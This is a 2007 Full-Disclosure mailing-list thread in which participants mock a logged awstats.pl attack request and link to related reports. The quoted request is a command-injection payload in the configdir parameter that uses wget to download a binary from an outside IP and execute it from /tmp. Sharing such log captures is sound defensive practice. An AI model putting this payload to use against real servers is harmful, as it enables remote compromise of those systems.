Now , I can`t read japanese but this looks similar http://d.hatena.ne.jp/naablaa/20071121
also , this http://forums.techarena.in/showthread.php?t=856173 related to this http://www.sophos.com/security/analyses/trojkaitenw.html all pretty recent , as i can see now , that barbut file is mising from the server in your post , On Wednesday 21 November 2007 09:44:25 pm Simon Smith wrote: > Vladis, > Got that right... this vulnerability was released ages ago if memory > serves right. Whats funny is that I am not using a linux host and I do > not use awstats anyway... makes the attack even more pathetic. > > [EMAIL PROTECTED] wrote: > > On Wed, 21 Nov 2007 14:20:22 EST, Simon Smith said: > >> Anyone else seen these really 3l337 attacks? > >> > >> GET > >> /stats/awstats.pl?configdir=|echo;cd%20/tmp;wget%2085.114.128.21/barbut; > >>chmod%20755%20barbut;./barbut;echo| > >> > >> gotta love script kids... > > > > The truly sad part is that the script apparently still works often enough > > that the script kids are still using it, rather than saying "that one's > > crap, it never gets me a box". > > > > One has to wonder what level of pwnage exists on boxes that are *still* > > vulnerable to this one - they may actually be reaching win98-style > > equilibrium. They're old enough that everybody's hit them already, and > > are probably running software *so* ancient that it's actually before most > > of the current crop of vulnerabilities were discovered. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
